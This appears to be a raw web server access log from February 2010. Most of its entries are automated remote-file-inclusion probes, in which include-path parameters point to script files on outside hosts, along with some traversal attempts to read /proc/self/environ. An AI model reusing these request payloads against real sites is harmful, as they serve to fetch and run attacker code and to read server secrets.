78.110.50.120 - - [15/Feb/2010:02:42:50 -0500] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:42:50 -0500] "GET /logs/access_log.Q109123000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:42:50 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:42:50 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
67.195.115.186 - - [15/Feb/2010:02:43:22 -0500] "GET /logs/access_log.Q109080700 HTTP/1.0" 200 3796760 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.172.236.41 - - [15/Feb/2010:02:44:03 -0500] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:44:03 -0500] "GET /logs/access_log.Q109111100%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:44:03 -0500] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:44:21 -0500] "GET /logs/access_log.Q110011200%20%20//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
122.201.82.173 - - [15/Feb/2010:02:44:26 -0500] "GET /logs/access_log.Q109082400/index.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
122.201.82.173 - - [15/Feb/2010:02:44:27 -0500] "GET /index.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
122.201.82.173 - - [15/Feb/2010:02:44:27 -0500] "GET /logs/index.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
219.94.194.248 - - [15/Feb/2010:02:44:44 -0500] "GET /logs/access_log.Q110011200%20%20//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:44:45 -0500] "GET /logs/error_log.Q109111100%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:44:51 -0500] "GET /logs/access_log.Q110020300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:44:57 -0500] "GET /logs/error_log.Q110020300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:45:01 -0500] "GET /logs/access_log.Q110020300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:45:07 -0500] "GET /logs/error_log.Q110020300%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:02:46:04 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.240.36.36 - - [15/Feb/2010:02:46:06 -0500] "GET /logs/index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:46:06 -0500] "GET /index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:46:06 -0500] "GET /logs/access_log.Q109060900/index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:46:40 -0500] "GET /index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:46:40 -0500] "GET /logs/index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:46:40 -0500] "GET /logs/access_log.Q109060900%20%20/index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:46:46 -0500] "GET /logs/access_log.Q109060900%20%20/index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:46:46 -0500] "GET /index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:46:46 -0500] "GET /logs/index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
221.143.46.124 - - [15/Feb/2010:02:47:17 -0500] "GET /logs/error_log.Q109100800//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
221.143.46.124 - - [15/Feb/2010:02:47:17 -0500] "GET //list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
221.143.46.124 - - [15/Feb/2010:02:47:20 -0500] "GET /logs//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
66.249.68.151 - - [15/Feb/2010:02:47:23 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0151455103B10600838B01F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
219.240.36.36 - - [15/Feb/2010:02:47:30 -0500] "GET /logs/index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:47:30 -0500] "GET /logs/access_log.Q109060900/index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
219.240.36.36 - - [15/Feb/2010:02:47:30 -0500] "GET /index.php?stranica=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:49:03 -0500] "GET /logs/access_log.Q109102900/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
194.249.18.67 - - [15/Feb/2010:02:49:10 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
194.249.18.67 - - [15/Feb/2010:02:49:11 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.85.1.152 - - [15/Feb/2010:02:49:26 -0500] "GET /logs/error_log.Q109061600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:49:26 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:49:26 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:49:43 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:49:43 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:49:43 -0500] "GET /logs/error_log.Q109061600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:49:50 -0500] "GET /logs/access_log.Q109122700/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:07 -0500] "GET /logs/access_log.Q109122700/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:16 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:16 -0500] "GET /logs/error_log.Q109061600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:16 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:22 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:22 -0500] "GET /logs/error_log.Q109061600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:22 -0500] "GET /logs/access_log.Q109122700/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:22 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:50:27 -0500] "GET /logs/access_log.Q109122700/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.54.22.2 - - [15/Feb/2010:02:50:58 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 248 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.22.2 - - [15/Feb/2010:02:50:58 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 243 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
121.3.30.165 - - [15/Feb/2010:02:51:20 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
121.3.30.165 - - [15/Feb/2010:02:51:20 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
174.36.1.51 - - [15/Feb/2010:02:51:47 -0500] "GET /logs/access_log.Q109091700/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:52:50 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:52:50 -0500] "GET /logs/error_log.Q109061600%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:52:50 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:52:54 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:52:54 -0500] "GET /logs/error_log.Q109061600%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:52:54 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:52:55 -0500] "GET /logs/access_log.Q109122700%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
200.85.1.152 - - [15/Feb/2010:02:53:00 -0500] "GET /logs/access_log.Q109122700%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:02:54:05 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.15 - - [15/Feb/2010:02:55:50 -0500] "GET /logs/access_log.Q109122400%20%20/become_editor.php?theme_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:55:50 -0500] "GET /logs/become_editor.php?theme_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:55:50 -0500] "GET /become_editor.php?theme_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:56:10 -0500] "GET /logs/error_log.Q109122900%20%20/become_editor.php?theme_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:13 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:13 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:13 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:13 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:13 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:16 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/error_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/error_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/error_log.Q110012000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/error_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/error_log.Q110012000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/error_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/access_log.Q110012000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:17 -0500] "GET /logs/access_log.Q110012000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.111.3.35 - - [15/Feb/2010:02:56:18 -0500] "GET //list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
61.111.3.35 - - [15/Feb/2010:02:56:18 -0500] "GET /logs/error_log.Q109100100//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
61.111.3.35 - - [15/Feb/2010:02:56:19 -0500] "GET /logs//list_notice.php?dir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
200.93.147.154 - - [15/Feb/2010:02:56:28 -0500] "GET /logs/access_log.Q109122700///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:56:28 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:56:28 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:33 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:33 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:35 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:36 -0500] "GET /logs/error_log.Q109090400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:37 -0500] "GET /logs/error_log.Q109090400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:39 -0500] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:39 -0500] "GET /logs/error_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:41 -0500] "GET /logs/error_log.Q110012000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:43 -0500] "GET /logs/error_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:47 -0500] "GET /logs/access_log.Q110012000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:47 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:47 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:49 -0500] "GET /logs/access_log.Q109071900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:49 -0500] "GET /logs/error_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:49 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:49 -0500] "GET /logs/error_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:49 -0500] "GET /logs/access_log.Q109071900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:51 -0500] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:51 -0500] "GET /logs/error_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:53 -0500] "GET /logs/error_log.Q110012000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
